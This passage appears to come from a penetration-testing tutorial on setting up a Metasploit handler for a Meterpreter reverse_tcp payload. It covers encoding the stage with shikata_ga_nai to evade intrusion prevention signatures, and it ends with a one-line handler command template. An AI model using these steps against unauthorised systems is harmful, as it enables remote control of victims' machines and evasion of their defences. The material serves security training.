Setting up payload handling in MSF
Before launching the module, we need to set up the handler. This handler is a stub that's used to handle the exploits that are launched outside Metasploit Framework:
- The handler module is loaded by typing the use exploit/multi/handler command:
- Next, we view the available options using the show options command, as shown in the following screenshot:
As we can see, the options are currently empty. These options are loaded once we define a payload. For example, we will use the windows/x64/meterpreter/reverse_tcp payload here and set the standard options for the payload, such as LHOST and LPORT. The stageencoder and enablestageencoding options are set to encode the second stage that's sent by the handler to the victim:
First, we set LHOST and LPORT before choosing the encoder, which will encode the stager using the shikata_ga_nai encoder. The reason we used a stager encoding mechanism is to bypass the IPSes/DPSes by encoding the stager, hence changing the signature on the fly.
We also need to enable stage encoding by setting its value to true. This option will enable the second stage encoding process with the encoder we selected. Once the stageencoding option has been set, the run -j command is executed to start the handler in the background.
Another way to run the handler is by using the handler command, which is available in the console, and passing arguments to it:
Hence, the one-liner command that's used to execute the handler with all the previously discussed settings will be handler -H <IP> -P <Port> -e <encoder> -p <payload>, as shown in the following screenshot:
Next, we will look at MSF payload generation.